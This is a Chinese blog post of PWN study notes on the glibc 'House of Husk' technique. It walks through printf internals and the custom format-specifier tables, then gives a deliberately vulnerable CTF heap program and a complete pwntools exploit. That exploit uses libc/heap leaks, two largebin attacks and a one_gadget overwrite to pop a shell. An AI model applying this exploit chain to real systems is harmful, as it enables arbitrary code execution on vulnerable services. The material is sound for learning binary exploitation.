当前位置：首页 > news >正文

【我的 PWN 学习手札】House of Husk

news 2025/11/21 10:04:49

House of Husk

House of Husk是利用格式化输出函数如printf、vprintf在打印输出时，会解析格式化字符如%x、%lld从而调用不同的格式化打印方法（函数）。同时C语言还提供了注册自定义格式化字符的方法。注册自定义格式化字符串输出方法，实际上是通过两张保存在全局的表实现的。为此我们以伪装/篡改这两张表为核心目标，劫持函数指针，从而控制程序流。

一、printf调用过程

printf是通过ldbl_strong_alias创建的__printf的别名，__printf又调用了vfprintf

因此printf➡__printf➡vfprintf

// stdio-common/printf.cint
__printf (const char *format, ...)
{va_list arg;int done;va_start (arg, format);done = vfprintf (stdout, format, arg);va_end (arg);return done;
}#undef _IO_printf
ldbl_strong_alias (__printf, printf);

vfprintf中预设了进行自定义格式化字符串处理的分支do_positional，其中继续调用printf_positional函数

因此vfprintf➡do_positional➡printf_positional

/* The function itself.  */
int vfprintf(FILE *s, const CHAR_T *format, va_list ap)
{.../* Use the slow path in case any printf handler is registered.  */if (__glibc_unlikely(__printf_function_table != NULL || __printf_modifier_table != NULL ||__printf_va_arg_table != NULL)) // 当三个表之一不为空时，即说明有自定义的格式化字符串处理方法goto do_positional;/* Process whole format string.  */ //执行默认的格式化打印规则do{...} while (*f != L_('\0'));/* Unlock stream and return.  */goto all_done;/* Hand off processing for positional parameters.  */
do_positional:if (__glibc_unlikely(workstart != NULL)){free(workstart);workstart = NULL;}done = printf_positional(s, format, readonly_format, ap, &ap_save,done, nspecs_done, lead_str_end, work_buffer,save_errno, grouping, thousands_sep);
all_done:...return done;
}

printf_positional函数中，检查自定义的格式化操作表，选择自定义格式化字符对应的函数指针，传入参数，完成自定义格式化操作。

因此printf_positional➡__printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);

static int
printf_positional(_IO_FILE *s, const CHAR_T *format, int readonly_format,va_list ap, va_list *ap_savep, int done, int nspecs_done,const UCHAR_T *lead_str_end,CHAR_T *work_buffer, int save_errno,const char *grouping, THOUSANDS_SEP_T thousands_sep)
{...for (const UCHAR_T *f = lead_str_end; *f != L_('\0');f = specs[nspecs++].next_fmt){.../* Parse the format specifier.  */nargs += __parse_one_specmb(f, nargs, &specs[nspecs], &max_ref_arg);}.../* Now walk through all format specifiers and process them.  */for (; (size_t)nspecs_done < nspecs; ++nspecs_done){.../* Fill variables from values in struct.  */.../* Fill in last information.  */.../* Maybe the buffer is too small.  */.../* Process format specifiers.  */while (1){extern printf_function **__printf_function_table;int function_done;if (spec <= UCHAR_MAX && __printf_function_table != NULL && __printf_function_table[(size_t)spec] != NULL){const void **ptr = alloca(specs[nspecs_done].ndata_args * sizeof(const void *));/* Fill in an array of pointers to the argument values.  */for (unsigned int i = 0; i < specs[nspecs_done].ndata_args;++i)ptr[i] = &args_value[specs[nspecs_done].data_arg + i];/* Call the function.  */function_done = __printf_function_table[(size_t)spec](s, &specs[nspecs_done].info, ptr);...}}...}
all_done:...
}

另外，printf_positional➡__parse_one_specmb()➡(*__printf_arginfo_table[spec->info.spec])(&spec->info, 1, &spec->data_arg_type,&spec->size)

size_t
attribute_hidden
__parse_one_specmb (const UCHAR_T *format, size_t posn,struct printf_spec *spec, size_t *max_ref_arg)
{...if (__builtin_expect (__printf_function_table == NULL, 1)|| spec->info.spec > UCHAR_MAX|| __printf_arginfo_table[spec->info.spec] == NULL/* We don't try to get the types for all arguments if the formatuses more than one.  The normal case is covered though.  Ifthe call returns -1 we continue with the normal specifiers.  */|| (int) (spec->ndata_args = (*__printf_arginfo_table[spec->info.spec])(&spec->info, 1, &spec->data_arg_type,&spec->size)) < 0){...}...
}

因此不论是__printf_arginfo_table还是__printf_function_table的注册函数都会被调用，这两个地方都可以用作劫持。然而有几点需要注意

__printf_arginfo_table中的函数指针先被调用，__printf_function_table中的函数指针后被调用
一般通过vprintf的__printf_function_table != null触发自定义格式化字符解析的分支
由于"1"和"2"，如果借助__printf_arginfo_table劫持程序流，一般也需要确保__printf_function_table != null
由于"1"和"2"，如果借助__printf_function_table劫持程序流，需要确保__printf_arginfo_table != null，否则会出现错误；而且因此也需要__printf_arginfo_table[spec->info.spec]==null

二、格式化字符处理函数注册机制

既然存在"自定义字符-自定义格式化函数"的映射处理机制，我们不妨看一下注册函数，来帮助我们更好理解，这几张表的作用。

通过在源码项目中查找"__printf_function_table"字符串，可以定位到"stdio-common/reg-printf.c"中的__register_printf_specifier函数

/* Register FUNC to be called to format SPEC specifiers.  */
int __register_printf_specifier(int spec, printf_function converter,printf_arginfo_size_function arginfo)
{if (spec < 0 || spec > (int)UCHAR_MAX){__set_errno(EINVAL);return -1;}int result = 0;__libc_lock_lock(lock);if (__printf_function_table == NULL) // 如果为空，说明是第一次注册，开始建表{__printf_arginfo_table = (printf_arginfo_size_function **)// /* Maximum value an `unsigned char' can hold.  (Minimum is 0.)  */// #  define UCHAR_MAX	255calloc(UCHAR_MAX + 1, sizeof(void *) * 2); 	//创建表，分配一段大小为(UCHAR_MAX + 1) * sizeof(void *) * 2的连续空间//可以存储0x200个(void*)类型数据if (__printf_arginfo_table == NULL){result = -1;goto out;}// __printf_arginfo_table 占分配空间前0x100个(void*)的空间// __printf_function_table占分配空间后0x100个(void*)的空间// |__printf_arginfo_table | __printf_function_table|// |<--------0x100-------->|<---------0x100-------->| 每个单元大小：sizeof(void*)__printf_function_table = (printf_function **)(__printf_arginfo_table + UCHAR_MAX + 1);}//自定义格式化字符spec与两张表的映射关系即索引关系__printf_function_table[spec] = converter;__printf_arginfo_table[spec] = arginfo;out:__libc_lock_unlock(lock);return result;
}
libc_hidden_def(__register_printf_specifier)weak_alias(__register_printf_specifier, register_printf_specifier);/* Register FUNC to be called to format SPEC specifiers.  */
int
__register_printf_function (int spec, printf_function converter,  // 封装__register_printf_specifierprintf_arginfo_function arginfo)
{return __register_printf_specifier (spec, converter,(printf_arginfo_size_function*) arginfo);
}
weak_alias (__register_printf_function, register_printf_function)

三、模板题与题解

pwn.c

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>char *chunk_list[0x100];void menu() {puts("1. add chunk");puts("2. delete chunk");puts("3. edit chunk");puts("4. show chunk");puts("5. exit");puts("choice:");
}int get_num() {char buf[0x10];read(0, buf, sizeof(buf));return atoi(buf);
}void add_chunk() {puts("index:");int index = get_num();puts("size:");int size = get_num();chunk_list[index] = malloc(size);
}void delete_chunk() {puts("index:");int index = get_num();free(chunk_list[index]);
}void edit_chunk() {puts("index:");int index = get_num();puts("length:");int length = get_num();puts("content:");read(0, chunk_list[index], length);
}void show_chunk() {puts("index:");int index = get_num();puts(chunk_list[index]);
}int main() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);while (1) {menu();int choice = get_num();switch (choice) {case 1:add_chunk();break;case 2:delete_chunk();break;case 3:edit_chunk();break;case 4:show_chunk();break;case 5:exit(0);default:printf("invalid choice %d.\n", choice);}}
}

exp.py

from pwn import *
elf=ELF("./pwn")
libc=ELF("./libc.so.6")
context.arch=elf.arch
context.log_level='debug'
context.os=elf.os
def add(index, size):io.sendafter(b"choice:", b"1")io.sendafter(b"index:", str(index).encode())io.sendafter(b"size:", str(size).encode())def delete(index):io.sendafter(b"choice:", b"2")io.sendafter(b"index:", str(index).encode())def edit(index, content):io.sendafter(b"choice:", b"3")io.sendafter(b"index:", str(index).encode())io.sendafter(b"length:", str(len(content)).encode())io.sendafter(b"content:", content)def show(index):io.sendafter(b"choice:", b"4")io.sendafter(b"index:", str(index).encode())io=process("./pwn")add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x18)
delete(2)
add(10,0x500)# 泄露heap_base
show(2)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x1d20b0
success("libc base: "+hex(libc.address))# 泄露libc_base
edit(2,b'a'*8*2)
show(2)
io.recvline()
io.recvuntil(b'a'*0x10)
heap_base=u64(io.recv(6).ljust(8,b'\x00')) &  ~0xfff
success("heap base: "+hex(heap_base))
edit(2,p64(libc.address+0x1d20b0)*2+p64(heap_base+0x6d0))# 通过偏移获取两张全局表的位置
__printf_function_table = libc.address + 0x1d3980
__printf_arginfo_table = libc.address+ 0x1d2890# largebin attack 让__printf_function_table指向一块内存，
# 之后将该内存申请出来在对应应该调用的函数指针位置写入one_gadget
edit(2,p64(0)*3+p64(__printf_function_table-0x20))
delete(0)
add(0,0x100)'''
0xd3361 execve("/bin/sh", r13, r12)
constraints:[r13] == NULL || r13 == NULL || r13 is a valid argv[r12] == NULL || r12 == NULL || r12 is a valid envp0xd3364 execve("/bin/sh", r13, rdx)
constraints:[r13] == NULL || r13 == NULL || r13 is a valid argv[rdx] == NULL || rdx == NULL || rdx is a valid envp0xd3367 execve("/bin/sh", rsi, rdx)
constraints:[rsi] == NULL || rsi == NULL || rsi is a valid argv[rdx] == NULL || rdx == NULL || rdx is a valid envp
'''
one_gadgets=[i +libc.address for i in [0xd3361,0xd3364,0xd3367]]
edit(2,p64(libc.address+0x1d20b0)*2+p64(heap_base+0x6d0)*2)
add(2,0x428)#########################################################
# 发现只写__printf_function_table，而__printf_arginfo_table为空时会在__parse_one_specmb的if判断中崩溃
# 于是这里再次largebin attack让__printf_arginfo_table指向一块堆区域，
# 同时由于堆未写入数据，很容易满足__printf_arginfo_table[spec]=null
add(10,0x300)
add(10,0x418)
add(11,0x18)
add(12,0x428)
add(13,0x18)
delete(12)
add(20,0x500)
edit(12,p64(0)*3+p64(__printf_arginfo_table-0x20))
delete(10)
add(10,0x100)
##########################################################edit(2,(ord('d')-2)*p64(0)+p64(one_gadgets[0]))io.sendlineafter(b"choice:",b"~!@")io.interactive()

在这里插入图片描述

【我的 PWN 学习手札】House of Husk

House of Husk

一、printf调用过程

二、格式化字符处理函数注册机制

三、模板题与题解

相关文章：

【我的 PWN 学习手札】House of Husk

(八)趣学设计模式之装饰器模式！

设计后端返回给前端的返回体

Element Plus中el-select选择器的下拉选项列表的样式设置

C高级（shell)

子宫腺肌症是如果引起的？

网络安全学习中，web渗透的测试流程是怎样的？

【软考】【2025年系统分析师拿证之路】【啃书】第十四章软件实现与测试（十五）

自然语言处理NLP深探

加载互联网免费地图资源并通过CesiumEarth快速浏览

Android 键盘输入按确认或换行直接触发提交

halcon三维点云数据处理（二十七）remove_bin_for_3d_object_localization

XFeat：轻量级的深度学习图像特征匹配

[MD] AG stable

微信小程序自定义导航栏实现指南

wav格式的音频压缩，WAV 转 MP3 VBR 体积缩减比为 13.5%、多个 MP3 格式音频合并为一个、文件夹存在则删除重建，不存在则直接建立

面试问题——如何解决移动端1px 边框问题？

鸿蒙开发第4篇__关于在鸿蒙应用中使用Java语言进行设计

什么是Ollama？什么是GGUF？二者之间有什么关系？

kubernetes 初学命令

Java 语言特性(面试系列2)

云原生核心技术 (7/12): K8s 核心概念白话解读(上)：Pod 和 Deployment 究竟是什么？

day52 ResNet18 CBAM

Java 8 Stream API 入门到实践详解

UE5 学习系列（三）创建和移动物体

大语言模型如何处理长文本？常用文本分割技术详解

STM32标准库-DMA直接存储器存取

新能源汽车智慧充电桩管理方案：新能源充电桩散热问题及消防安全监管方案

3403. 从盒子中找出字典序最大的字符串 I

select、poll、epoll 与 Reactor 模式